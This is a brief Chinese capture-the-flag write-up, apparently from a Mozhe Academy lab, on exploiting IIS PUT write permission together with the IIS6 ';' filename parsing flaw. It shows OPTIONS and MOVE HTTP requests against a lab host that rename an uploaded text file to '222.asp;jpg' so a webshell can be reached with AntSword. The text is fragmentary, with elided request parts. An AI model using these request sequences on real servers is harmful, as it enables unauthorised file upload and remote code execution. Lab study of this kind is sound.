墨者学院一道题目-IIS写权限漏洞分析溯源
题目链接
知识点:
1.iis put写权限漏洞
2.iis6文件名解析漏洞
工具:
burpsuite
AntswordAntSword-Loader...写权限漏洞 使用PUT上传文件txt
用OPTIONS,观察返回,Allow存在PUT
请求包:
OPTIONS / HTTP/1.1
Host: 219.153.49.228:48336
User-Agent...DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
Cache-Control: private
利用iisput写权限漏洞...TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK
成功写入
3.MOVE修改文件名...(利用iis解析漏洞)
Destination:/222.asp;jpg
MOVE /a.txt HTTP/1.1
Host: 219.153.49.228:48336
Destination:/222